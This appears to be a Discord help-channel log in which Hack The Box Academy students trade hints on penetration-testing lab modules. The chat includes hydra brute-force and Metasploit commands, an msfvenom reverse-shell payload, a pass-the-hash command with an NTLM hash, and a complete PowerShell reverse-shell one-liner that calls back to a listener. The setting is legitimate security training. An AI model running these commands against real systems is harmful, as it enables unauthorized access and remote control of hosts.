hydra -l kira -P mut_pass.list ftp://10.129.202.64 -t 48
```
To those who have passed this challenge, have I made any mistakes?
you can just do the password from the hint by itself, rather than the whole list
@fringe shell thx I knew something was wrong lmao found it
how i can solve this
All good 😉 I tested and ||the latest version of the tool can be run with python3.9 on the target, so the lab should be fine ||
What is confusing you?
I don't know how I can filter the results
There's an option in curl I believe, the page should tell you what you need, make sure you read the section carefully
sorry but i can not get it
I am not at my computer to assist further
I remember this one, I struggled a bit
There’s a lot of different solutions probably, but I used ||grep||
A combination of grep, cut, and others work
Googling I did find an htb forum post about it too
Yeah I looked at my solution command I kept and I used grep with regex
who said the user in question would have a home folder on the box?
typically a user does, but they dont necessarily have to have one
even more mind-blowing: there can be a home folder present for a user that doesnt exist!
so lesson is dont trust home folders to translate 1to1 users on a box
Currently working on the last two questions of the "AD Enumeration & Attacks - Skills Assessment Part II" module. I've cracked the C**** user's password and am trying to figure out how to access the DC. Can someone give me a nudge?
DM
What is the 2021 OWASP Top 10 classification for this vulnerability?
I couldn't ss from my VM even though I did it with Windows+Shift+S, but anyways, could someone answer that question for me.
Anybody know what was the number one OWASP web vulnerabilities in 2021?
😭
I cant take it anymore!
Service start timed out, OK if running a command or non-service executable
Can someone hint to what wordlists im supposed to use for the attacking common services easy on the S*** service, I have tried both the user and pass wordlist included in the resources and now have tried another like 6 wordlists in the /wordlists folder
you're right ahead of me, you're trying to help me out while you wait for your help
wdym stream it?
honestly dont even worry about the question, focus on trying to escalate first and fill in the questions later
nothing works
TypeError leaking initial Frag size, is the target patched?
[*] Exploit completed, but no session was created.
the module says to use a certain exploit but the target is not vulnerable to it... I swear half the time its because of some weird issue like this
its rigged 😭
which question are you on?
Exploit the target using what you've learned in this section, then submit the name of the file located in htb-student's Documents folder. (Format: filename.extension)
even the next module is giving me the same error
I gave up and started playing Halo
I tried different exploits, I even scanned it to see if it was vulnerable to Eternal Blue but its NOT
you just have to follow the example in the module
I did
I searched msfconsole for the smb exploit
I set the options
when you run search smb, which exploit did you choose?
exploit(windows/smb/psexec)
should work assuming you set all the options correctly, I just ran it to double check.
can you show me the options you set?
yeah
I am trying to update metasploit
maybe it will work
rhosts is the target ip
lhost is tun0
user "htb-student" and password "HTB_@cademy_stdnt!" for smbuser and smbpass
I can't believe you got it
there is something wrong on my end
yes
if that doesnt work maybe try resetting your VPN connection. not sure, it did work for me just now.
yes, I tried the restart vpn, reset target..
but even the next section, Infiltrating Windows gives me the same error
did you try on the pwnbox just to see if that works?
ah no I didnt, good idea!
it is my vm then
😭
can you believe I spent hours on something so simple
I have been there many times....
didnt work
Exploit failed [unreachable]: Rex::ConnectionTimeout The connection with (10.129.201.160:445) timed out.
I changed the lport to 445 and then get the same error as my kali vm, Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
omg
I set lport to 1337 and I got in
now I get Terminate channel 1? [y/N] every time I enter a command
I finally got it
thanks @tidal mango
because in this instance the route to privilege escalation is indeed within taught information
it's not like it's its own separate binary subject. all of hacking is arguably privilege escalation lol
its just a word
dont obsess over the word
just focus on the taught information and methodology
guzzling from the firehose and surviving is half the fun of hacking
for
Module name: Attacking Common Applications
Section name: Attacking Thick Client
how do I bypass the error 'System.Management.Automation.Runspaces.InitialSessionState'?
seems like i get this issue by deselecting the delete subfolders and files and delete?
nvm i got it
just had to open powershell first so it doesn't get murdered (if anyone has another way pls share)
Hello guys need some help with Linux fundamentals module
Path is file system management
I have submitted the answer in the format:000
But also it is not accepting
Any guesses?
Question is
What is the size in GiB of the "/dev/sda" disk in our PwnBox? Format: 000
My file size is 8 GB
But 008 is not accepted
Either it is the wrong answer or there is some space before and after. What is the command you used to see the size of the disk?
Oh my god for the Getting Started -Public Exploits section. I was overthinking... it was right in the question. I was using gobuster trying to find a path.
feels so good though
Establish a web shell with the target using the concepts covered in this section. Submit the name of the user on the target that the commands are being issued as. In order to get the correct answer you must navigate to the web shell you upload using the vHost name. (Format: **, 1 space)
it's not accepting the hostname
any tip ?
mod :SHELLS & PAYLOADS
shouldn't it be the user rather than the hostname?
(Format: **, 1 space)
are you submitting the hostname or the user?
yes
Hi everyone, i have a question about the skill assessment part 1 of the active directory module. I managed to answer the first three questions and I managed to establish a tunnel with the internal network. However, I can't find out which IP address computer MS01 corresponds to. So I can't connect with xfreerdp to go on to the next step. Can anyone help me?
you can use nslookup to find the IP of MS01
Thank you
I have the same problem, Any hint?
module: attacking common applications --> WordPress --> Using the methods shown in this section, find another system user whose login shell is set to /bin/bash.
I've enumerated with `sudo wpscan --url blog.inlanefreight.local --enumerate u` (found user: doug), bruteforced the password. Logged in, enumerated users again (wp-admin + xmlrpc) but no extra accounts; in the admin panel there are only 2 users known.
hello
@fiery berry
```
lsblk -b /dev/sda
NAME   MAJ:MIN RM       SIZE RO TYPE MOUNTPOINT
sda      8:0    0 8589934592  0 disk
├─sda1   8:1    0 7515144192  0 part /
└─sda2   8:2    0 1073741824  0 part [SWAP]
```
This was my output
seems absolutely legitimate
use the -l option
Hello to everybody. I was able to get flag 2 from the sqlmap module with the --batch --dump command. But this gave me all the tables and results of the injection. I just want to have the content of flag2 on screen. I tried this with -T flag2. It seems it doesn't work, and the injection is also not performed. Do you know why?
bro i swear
@spring tundra
i have the account email and pass
u need to specify the database with -D
just not the 2fa
I pinged a moderator for you so you can get support
Ah, it's a database, not a table. LoL. Thank youuuu for the info
Ok i will try
Mainly it does it also with -t, it's just that without the --dump command you don't see the results on screen. You need to manually cat the results from the folder it saves the output to.
question 3 of sessions in metasploit module: I try to privesc with 2 public exploits I found but I'm getting this error:
```
./exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./exploit)
```
please help, been on this for DAYS now
What are you after?
@fiery berry
```
htb-student@nixfund:~$ lsblk -b -l /dev/sda
NAME MAJ:MIN RM       SIZE RO TYPE MOUNTPOINT
sda    8:0    0 8589934592  0 disk
sda1   8:1    0 7515144192  0 part /
sda2   8:2    0 1073741824  0 part [SWAP]
```
Got this output
~~remove the -b, use only the -l. ~~You can just use lsblk and nothing more
Ok
@fiery berry
```
htb-student@nixfund:~$ lsblk -l /dev/sda
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda    8:0    0   8G  0 disk
sda1   8:1    0   7G  0 part /
sda2   8:2    0   1G  0 part [SWAP]
```
is that the pwnbox?
8G is incorrect
HTB academy Linux fundamentals
File system management
can I see a screen of your terminal? I don't recognise the hostname "nixfund" unless I'm missing something
Hi! Im doing the Kerberos Attacks skill assessment, I was unable to crack the ||daniel.whitehead|| hash, is it supposed to be like that?
Hi all!! I am doing Using Splunk Application. I have connected to https://TargetIP:8000 but couldn't find Sysmon App for Splunk to access it. I have also checked if there is a downloaded file so that i can install it but no luck. Can someone please help me with this?
hi, i have a question about https://academy.hackthebox.com/module/54/section/511 -- Attacking Web Applications with Ffuf, Skills Assessment - Web Fuzzing.
i'm on the "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" question and have fuzzed each of the servers with
```
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:32562/FUZZ -recursion -recursion-depth 1 -e .php -v -mc 200,301
```
I haven't been able to pick out the access denied page. Can anyone tell me if I'm on the right track?
You should be able to crack the hash with Hashcat.
||-m 18200 ||
In **Active Directory Enumeration & Attacks** > Living Off the Land > Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. [...]
What does "administrative privileges" mean? I can easily filter disabled accounts and display the description (and find the flag), but could someone explain to me what I am supposed to do to filter on users with "administrative privileges", please?
Hello Everyone
Today is a wonderful day: after almost a YEAR, I finally completed the Penetration Tester Path.. Thanks to everyone who has been of assistance to me during the journey.. I'm looking forward to taking the CPTS, eJPT in one or two months' time.. wish me luck
Hi everyone, I'm having trouble with the section Sudo of the module Linux Privilege Escalation. The attacks shown in the module do not work. The only thing I can use with sudo is ncdu, but sudo /bin/ncdu throws the error Sorry, user htb-student is not allowed to execute '/bin/ncdu' as root on ubuntu. Can someone give me a hint? 🙂
Congrats and good luck
Think domain admins in this case
ok thanks : so it's just about doing a group membership LDAP filtering ?
check the sudo version
Key word is disabled in this case anyways but yeah ig
I did that for some reason was not able to crack it, found it using a smb bruteforce via crackmapexec
Check your DM
Thank you very much. I had a knot in my head 🙂
I'm currently trying to complete this question: "Exploit the Apache Druid service and find the flag.txt file." But when I search for exploits I can only find an information disclosure and an RCE that I don't think works; any help would be appreciated.
this is the service: ||2181/tcp open zookeeper Zookeeper 3.4.14-4c25d480e66aadd371de8bd2fd8da255ac140bcf (Built on 03/06/2019)|| this is the RCE: ||exploit/linux/http/apache_druid_js_rce 2021-01-21 excellent Yes Apache Druid 0.20.0 Remote Command Execution|| this is the info disclosure: ||auxiliary/gather/zookeeper_info_disclosure 2020-10-14 normal No Apache ZooKeeper Information Disclosure||
if the RCE is meant to work then ill just keep trying
hi, replying to see if anyone can chime in on this. tnx!
is there a reason you're looking for .php files? @elder ibex
when i did the initial fuzz to identify exts, that was one of them. i re-ran the command for each of the file exts.
i was able to answer the previous question in the assessment correctly - "Before you run your page fuzzing scan, you should first run an extension fuzzing scan. What are the different extensions accepted by the domains? "
yepper...i definitely could have done something wrong. but, i basically did that same command, changing the sub-domain name and running that against each of the file exts.
hmm, i'll try it again w/out the matching.
if you're meant to have access denied you'll probably get a different response code
well, the page says "you don't have access to this file" in the lab it was a status 200 for that page
worth a try, could also match that phrase
worth a try.
bruh
How were we supposed to know for the first question without looking at the hint??
the hint gives username/password but how were we even supposed to get that man
Sorry what hint?
I just looked at the linked module, and none of the hints show creds
If you're referring to the "rdp to" part: then that's very much not a hint lol
its slightly up in the page if you scroll up. Usually there isnt a hint there
You have to click on it to show
Default creds
I searched for those but I never saw that certain password.
thank you for helping me again by the way
Np
I just googled the password in the hint verbatim and it doesn't pull up any results. I dont believe they are default
I think default creds is something you should see from a wordlist perspective
What module is this ?
It's probably also findable via enumeration
yes
Oh wait I think on the attack machine they give you a creds file
omg
I NEVER open that file
thanks
yeah it has another set
Cause I remember feeling smrt when I figured it out lol
yeah the credentials for the payloads & shells aren't default iirc
ugg...i'm still having trouble with this one. per @fresh jay, i removed the -mc to open it up. but, still can't identify the right page.
ffuf has an option to search for specific text inside the web page, that should help
i'll give it a try. tnx.
password attacks, password reuse/Default Passwords. The question where you need to get the MySQL password. This is what I did so far: ssh as sam, read history, check other users, but was unable to read their histories or copy id_rsa or the bak files. I couldn't figure out how to do a privilege escalation or lateral movement to another account. So now, I am trying to brute force kira's ssh password with the mut_password.list that I generated in the previous session. However, after 5hrs and still running, no luck. Any hints?? I will keep the hydra brute forcing running until it finishes, but I would like to know if there is another way about this?
Try to paste it without using markdown
hi, thanks again for the tip. I'm still having trouble though. I tested the syntax with:
```
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:58232/FUZZ -recursion -recursion-depth 1 -e .php,.phps,.php7 -mr 'Welcome'
```
and had success. Then I used this:
```
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://faculty.academy.htb:58232/FUZZ -recursion -recursion-depth 1 -e .php,.phps,.php7 -mr 'have access'
```
no luck. I'm missing something, but not sure what.
for ease of access, here's my original question: hi, i have a question about https://academy.hackthebox.com/module/54/section/511 -- Attacking Web Applications with Ffuf, Skills Assessment - Web Fuzzing.
i'm on the "One of the pages you will identify should say 'You don't have access!'. What is the full page URL?" question and have fuzzed each of the servers with
```
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt:FUZZ -u http://admin.academy.htb:32562/FUZZ -recursion -recursion-depth 1 -e .php -v -mc 200,301
```
i haven't been able to pick out the access denied page. can anyone tell me if i'm on the right track?
For commands you can use the backticks for code blocks (commands) - https://support.discord.com/hc/en-us/articles/210298617-Markdown-Text-101-Chat-Formatting-Bold-Italic-Underline-
thanks..i figured out it was the hashtag...sorry about that
Hello, got a small question
For the question "What is the type of the service of the "syslog.service"?" from Linux Fundamentals I tried the command "systemctl show syslog | grep Type"
On my VM I only get:
ExitType=main
On a Pwnbox I get:
Type=notify ||-> This is the answer||
ExitType=main
Anyone know why?
syslog is probably configured for notification on the pwnbox
check the 'whois' output on the command line. You're close but the answer is a little longer
I have a question about The Live Engagement, second question at https://academy.hackthebox.com/module/115/section/1139
I have been trying to get this payload to work:
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=ipaddress LPORT=4321 -f war > nameoffile.war
```
I did ifconfig and tried all of the ip addresses for the LHOST option but netcat never hears anything back
Module: OSINT Corporate Recon
I'm having trouble with the last question on the Domain Structure module: "How many JS resources on the website?"
I skimmed through the module but I'm not having any luck. Any help is appreciated.
Thanks
yw
For those who've completed the "Whitebox Attacks" module, mind a quick assist with the client-side parameter pollution section? Not sure I understand the objective.
Yow people
or khaotic
could you please help me
Something just doesn't add up
I don't get any flag in introduction to bash scripting
i'm still stuck on this, if anyone has any ideas. the hint says to use PORT. that sounds like making the port a variable...is my understanding correct??
typically all caps like that would indicate a variable of some type - yes
so, they want me to build a list of ports and scan all of them, along with the other variables...this could be a long day.
Hi everyone! I'm a bit stuck on the skill assessment of the active directory module. After downloading chisel to create a tunnel, I've been trying for several days to upload chisel to the first machine on the network (the pivot machine). I haven't been able to do it and it crashes every time. Does anyone have any idea how I can do this?
I used the web shell, and i tried with a reverse shell with Invoke-WebRequest and a python server on my attack host
hello, i'm new on discord. i have a simple question. why can't i send messages on the pwnbox channel and other channels?
Hello!
I am doing the "Linux Fundamentals" module, and I'm stuck at the section "Find Files and Directories", specifically in the question "What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?".
I tried to answer it with the command `find / -type f -regex ".*conf.*" -size -28k -size +25k -newermt 2020-03-03 -exec ls -ls {} \; 2>/dev/null`, and there are more than 10 files that match this filter. After some time testing other commands I decided to copy and paste every single file in the input box, and none of them was the correct one :c
btw, I use `-regex ".*conf.*"` because none of the files with `-name *.config` were the answer either
Read and follow #welcome
Does anyone know if there's something wrong with the question or I'm not doing it correctly?
@acoustic owl thank you! i'll try that
I'm in the PtH module on the final question. On powershell I do:
```
.\Invoke-WMIExec.ps1 -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e <base64 powershell string here>"
```
But this won't show up in my netcat listener
I don't have notes on that specific exercise, can you tell me what the IP addresses are of DC01, the box you've compromised, and the IP of where your netcat listener is at?
The IP of the compromised server I'm on is 10.129.29.171 . The IP of DC01 is 172.16.1.10 . My listener is on 10.129.29.171
@trail leaf
So you're running the listener on the compromised server? 🤔
that should work then
I thought you were running it on the pwnbox, at which point I'd tell you that DC01 can't reach the pwnbox because they're on different networks with no route to each other
right
Have you tried importing it as a module and then running the command, that might be your problem
Hello all, I'm currently working on the "Information Gathering: Web Edition" module in the CBBH path. I cannot seem to be able to connect to app.inlanefreight.local or dev.inlanefreight.local. I have already added them to my /etc/hosts along with the IP. I feel like I've scoured the entire internet to fix this and I can't seem to do it. Any ideas?
I imported it with: Import-Module .\Invoke-TheHash.psd1
are you connected to the vpn
on the vpn yea
😶🌫️
ip of reverse shell: 10.129.29.171:8001
then you should just be calling Invoke-WMIExec <options...>
no need to do the .\
eyo guys, I'm trying to check my account here on Discord but the bot told me that it isn't my ID. Isn't it my student ID?
again, don't do .\Invoke-WMIExec, leave that out, just do Invoke-WMIExec
If you've imported the module, those functions will be available from the shell
alright I'm opening a VM now give me a second
ok, and btw you're the best 😄
typically all caps like that would indicate a variable of some type - yes
Question: What IP did you enter when creating the reverse shell command?
If the DC ip is 172.16.1.10, how will it know where 10.129.29.171 is?
Whichever one is in the same subnet as the target on your attack machine
Multiple ips, different subnets
DC01 doesn't have a NIC for 10.129.x.x, so giving that as the IP address means it has no clue where to send the connection back to
What module are you on?
But yes the correct callback would be 172.16.1.5, if you're doing port forwarding and tunneling that's where the fun is
This is pass the hash in password attacks
Ah
GOT IT!
Then you're not really gonna need a reverse shell
You're already where you need to be
well pretty much anyway, I just had to type that because the reverse shell finally replied
responded*
I should be able to get it myself from here
Thanks
@trail leaf How was the Business CTF??
My team got banned from it for being too good
Well and because we weren't all real employees of the company. but the too good part is what made them get suspicious of us
This isn't the place to discuss
oops
👢
my fault
I did it last year, not sure why I still have the role
Hey guys, very basic question. Sometimes I see the use of "" double quotes, sometimes they use '' single quotes. For example for sqlmap sometimes the examples are with "", sometimes with ''. Does it matter?
I think it doesn't matter. As long as it is consistent?
Stuck on Windows Privilege Escalation pillaging. I used samdump2, giving it the 'SYSTEM' and 'SAM' file, and gave it the hash for Administrator but nothing worked. I think I am getting an 'empty hash'
It actually does matter, as in most cases double quotes ("") are interpreted as string and commands, and single quotes ('') are a literal string and it doesn't try to parse commands or special characters in the line
try it with secretsdump, instead.
hey, is there any way to enumerate all local groups a domain user is a member of in an AD environment? edit: I want to enumerate from a Linux machine
What module is this for?
It's for AD enumeration and attacks. You find all kerberoastable users, then he asks which group the user is a member of in the dc.
The impacket tool shows it, but I wonder if there are other ways
¯_(ツ)_/¯
just query ldap no?
Hello, could someone please help me? I am in the Attacking Common Services module, and I have some trouble with this question: "what is the password for the username jason". I used auxiliary/scanner/smb/smb_login in Metasploit, then I put the RHOSTS, but after that idk how to set the resources that HTB gave me to execute the brute force attack. Can someone please help me?
it's not AD but local groups
ohhh
I think the only way is having access to the user on each host (maybe?)
options should give you all available, changeable fields for the exploit
thanks @fathom pendant ❤️
I want to say enum4linux-ng should also work here but I'm not sure about that one
AD Enumeration & Attacks - Skills Assessment Part II. Locate a configuration file containing an MSSQL connection string. There is no file in SMB and I think there is supposed to be. I'm logging in with BR086
user
doesn't have to be in a shared folder 🤷♂️
enumerate it thoroughly
thanks for the help, I finally got it using ldapsearch and windapsearch
true, chatgpt can build it for you
Or, just learn it 
AD is just ldap in a trenchcoat. the knowledge will always be useful
Anyone else stuck on waiting for the reverse shell to connect in Password Attacks, Pass the Hash?
I've been waiting for 10 minutes and I'm sure I did it correctly
Then you probably didn't do it correctly
worth my time? not sure, better learn AD and ask gpt for queries, i mean, what can I get out of learning ldap? (real question)
Custom search queries, plus opening the door for some ldap abuses using ldapmodify without needing a windows box when impacket scripts don't do the job
well, I followed the example in the section, set the listening IP to that of the other network adapter (172.xxx) and used that reverse shell generator website to create the shell thing in PowerShell #3 (Base64)
I agree with the ldap abuses part
I've had bloodhound ingestors miss things
true
Am I missing anything?
I am not saying it's useless, I am just trying to see if I should make it more of a priority for me
You can get by in a lot of cases without knowing exact LDAP queries, but probably a good subject to visit when you want to dive deeper into things imo
saying this as someone who needs to do that at some point
Using chatgpt to construct queries is probably fine, I just personally would rather have more first-hand knowledge of things. Especially since cross-domain knowledge stuff is the bread and butter of this trade. Who knows where else my ldap knowledge might pop up and become more useful?
I have it on my todo list to learn ldap deeper. My surface scratching of it already dug up some neat tricks I haven't seen posted publicly and I'm sure there's more deeper under the surface.
seeing screenshots and/or commands would be useful
cool, I'll add it to my list, looks like it will be a useful tool
The command for the reverse shell in powershell, the inputs on the generator, and the listener command that I executed first and the jump box ipconfig.
well looks like command executed, so your encoded powershell command is probably bunk
weird, maybe try restarting the lab?
try something simpler like seeing if you can just even IWR the port
what I'll often do if a reverse shell is being picky and stealth isn't a concern is to pull down my malicious payload with one request and then do a follow-up second request to execute it.
On the shell generator, I see that the advanced setting is set to Shell: sh and Encoding: Base64. Is that wrong?
sh would be wrong. idr if that site is smart enough to auto correct it
Ah, I've set it to Powershell now. Let's see if that works.
nah, it doesn't use the sh string at all
this is what it decodes to
$client = New-Object System.Net.Sockets.TCPClient("172.16.1.5",8443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
wait that base64 does look off
Can someone help me? The lab crashes whenever I want to upload it
do you have the vpn and pwnbox running at same time
No i stopped the pwnbox
any error messages?
timed out
what timed out
where did the base64 come from?
i just have a timed out : "The server at 10.129.56.199 is taking too long to respond"
should I have to restart my VM? because I have multiple interfaces connected to the vpn with the same IP
Think it came from the selected option on the left, one selected in blue
guys how do I solve "virtualized intel VT-x/EPT is not supported on this platform"
on vmware
i restarted many times the machine
Look at the encoded output that revshells has versus the command you ran though
they're different
AD Enumeration & Attacks - Skills Assessment Part II. Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. I'm not sure how to connect to SQL01, I'm trying mssqlclient but it's not working
what you ran was another encoded powershell -e command
guys please tell me how to solve
virtualized intel VT-x/EPT is not supported on this platform
in vmware windows 10
I'm on windows 11 btw
yes that would 100% kill your connection
arkhh so i have to restart my VM ?
okay, I'll test that; I've been blocked for several days now
same thing happens if you run vpn and pwnbox at same time
HTB likes only one active connection per account
virtualized intel VT-x/EPT is not supported on this platform
I don't know how to solve this on VMware, I'm gonna go crazy asf
Okay ty
not relevant to this channel. Verify your account in #welcome to access the rest of the server
I cant connect to mssql
I see that now, I changed my command
no, just use revshells.com and click copy, and paste it in
Now when i want to upload chisel, there is a msg "server error in '/' application"
that means your upload method is bunk for some reason
As in, paste it over the blue text, and only the blue text?
not compatible with the web shell provided
hmm okay i'll try webRequest with a powershell reverse shell
I just finished the shells & payloads module and I think I spent more time setting up proxychains than I did getting shells, is it supposed to be that way (especially considering up until this point there was no talk about pivoting, tunneling and port forwarding) or did I overcomplicate the skill assessment?
powershell -e JAB...
Probably nowhere, but definitely not here
that should be what's after the -Command flag
BRUH
the base64 should start with JAB
you definitely helped me
yw
I did it, now I'll wait for the response for the next bit
you should get a callback within a minute
AD Enumeration & Attacks - Skills Assessment Part II. Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host. How do I get the netdb password?
It worked, Thanks for the assist and patience
It's a skill assessment. Apply the information learned in the module
Press ctrl+f a 2nd time
never noticed that was a thing
any hint for the cleartext creds? I found the username but not the password
Anyone completed the module Injection Attacks?
it's a skill assessment, you must apply the lessons from the module
Because they make you think, and apply the skills you're meant to be learning?
they're the same
... no.
weirdest take I've ever seen
Imagine being this confidently wrong.
Most of the skill assessments are actually straight forward. The hard part is finding the path.
And yeah, that's a weird take.
are you trying to piss people off 😂
calling pentesters just a quality assurance role is an actual insult
that's like fighting words
No it's not
No, it's not.
You're flat wrong
Dammit madf0x, beat me to it
What am I reading lol
That is not what QA is
moo says that pentesting isn't hacking, it's just quality assurance
Bro have you been doing CPTS this whole time aiming for a QA role???
Ok so if it’s so straight forward then you should have no issues getting through the modules and assessments 👍🏼
Savage. lol
Guys, he's noob rank - he clearly knows his stuff.
I know, but I can’t really believe that take lol
Ahh alright, you’re completely right
Cough cough
It also raises the question, why are they even doing the AD enum module....
Oh oh oh!
We’re all just a bunch of skids
They should rename the platform to "QA The Box!"
No hackers here
I mean, aren't you basically describing what you've been doing your entire time on this server so far?
Yet here you are
did you even read the article
Saying the assessments aren’t straight forward enough
Thats the title, not the article
It’s funny watching madfox and wolfie saying the same things seconds apart
It's like an echo
😦
lmao didn't mean for it to be taken negatively
My side of the chalkboard looks empty =/
Lmao
Considering what happens at the end of NGE, I'm not sure I appreciate that analogy. lmao
Moo has some interesting opinions
spiciest take of the year
That's a strange way of spelling 'wrong'.
It feels like they read things, without understanding them.
you're on the wrong platform if you want a QA role
If you had stood up today at Bsides and said that pentesters aren't hackers, they are QA... you'd have been laughed out of the room.
I should become a couch lol, "you are not bad, just different"
Yes
like I said, that's fighting words. I've known people that would get physical and treat it as an actual insult
Coach* lmao